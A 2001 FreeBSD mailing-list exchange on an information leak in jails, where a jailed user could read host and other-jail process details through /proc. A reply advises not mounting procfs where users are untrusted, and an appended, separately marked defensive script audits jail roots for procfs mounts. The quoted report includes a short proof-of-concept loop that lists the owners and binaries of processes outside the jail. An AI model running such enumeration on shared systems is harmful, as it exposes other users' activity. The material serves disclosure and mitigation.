Date: Tue, 30 Oct 2001 17:01:16 -0500 (EST)
From: Robert Watson <rwatson@freebsd.org>
To: opr <opr@bsdaemon.be>
Cc: freebsd-hackers@freebsd.org
Subject: Re: jail's /proc
Message-ID: <Pine.NEB.3.96L.1011030165937.58426J-100000@fledge.watson.org>
In-Reply-To: <20011029183626.36f8e686.opr@bsdaemon.be>
This is fixed in 5.0-CURRENT, but the architectural improvements to support the fix have not been merged, since they're still in flux. My general advice is to not mount procfs on systems with untrusted users. It's almost possible to not lose functionality in doing that -- I understand DES has patches to truss to make it use ptrace(), which is the last remaining instance I can think of. (Actually, I think ps -e requires procfs still.)

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services

On Mon, 29 Oct 2001, opr wrote:

>
> Hello,
>
> I really have no clue if I should mail this to you guys, but we've found some issues in the jail's /proc. We were able to find information about processes running outside the jail, or running in other jails.
> E.g. when I run sshd in the host system, and it has PID 655, I can log in on the jail, and by executing "ls -l /proc/665/file" I can see what binary is running on pid 655. So any user of the jail system can see what processes you run on that server. I'm running FreeBSD 4.4-RELEASE on an i386.
>
> greetz,
>
> Pieter Danhieux
>
> Proof of concept shellscript:
>
> #!/bin/sh
> _COUNT=0;
> while [ $_COUNT -le 65000 ];
> do
>     if [ -f /proc/$_COUNT/file ];
>     then
>         _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`;
>         _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`;
>         echo "PID= $_COUNT USER= $_USER PROC= $_PROC";
>     fi
>     _COUNT=`expr $_COUNT + 1`;
> done
>
> -----------------
> [www.bsdaemon.be]
> -----------------
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-hackers" in the body of the message
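Robert's mitigation above is "don't mount procfs where untrusted users live", which on a jail host means auditing the mount table for procfs mounted under any jail root. The following audit functions are an added example, not code from the thread or from FreeBSD; the mount(8)-style listing and the jail roots under /usr/jails are constructed sample data.

```sh
#!/bin/sh
# Added example (not from the thread): audit a mount(8) listing for procfs
# mounts inside jail roots. The listing below is constructed sample data.

SAMPLE_MOUNTS='/dev/ad0s1a on / (ufs, local)
devfs on /dev (devfs, local)
procfs on /proc (procfs, local)
/dev/ad0s1e on /usr/jails/web (ufs, local)
procfs on /usr/jails/web/proc (procfs, local)
devfs on /usr/jails/web/dev (devfs, local)
/dev/ad0s1f on /usr/jails/db (ufs, local)'

# Print the mountpoint of every procfs mount in a mount(8) listing ($1).
# mount(8) prints "<device> on <mountpoint> (<type>, <options>)", so the
# filesystem type is the 4th whitespace-separated field, e.g. "(procfs,".
procfs_mountpoints() {
    printf '%s\n' "$1" | awk '$4 ~ /^\(procfs[,)]/ { print $3 }'
}

# Return 0 (true) when a procfs mount sits below jail root $2 in listing $1.
jail_has_procfs() {
    root=${2%/}
    for mp in $(procfs_mountpoints "$1"); do
        case "$mp" in
            "$root"/*) return 0 ;;
        esac
    done
    return 1
}

# Print "<jail_root> <mountpoint>" for each jail root (args after the
# listing) that has procfs mounted anywhere inside it.
report_jail_procfs() {
    listing=$1; shift
    for root in "$@"; do
        for mp in $(procfs_mountpoints "$listing"); do
            case "$mp" in
                "${root%/}"/*) printf '%s %s\n' "$root" "$mp" ;;
            esac
        done
    done
}

# Sample run against the constructed listing; on a real host use
# report_jail_procfs "$(mount)" /usr/jails/* instead.
report_jail_procfs "$SAMPLE_MOUNTS" /usr/jails/web /usr/jails/db
```

On the sample data only /usr/jails/web is flagged, because its procfs mount at /usr/jails/web/proc is what a jailed user would browse with ls -l /proc/PID/file.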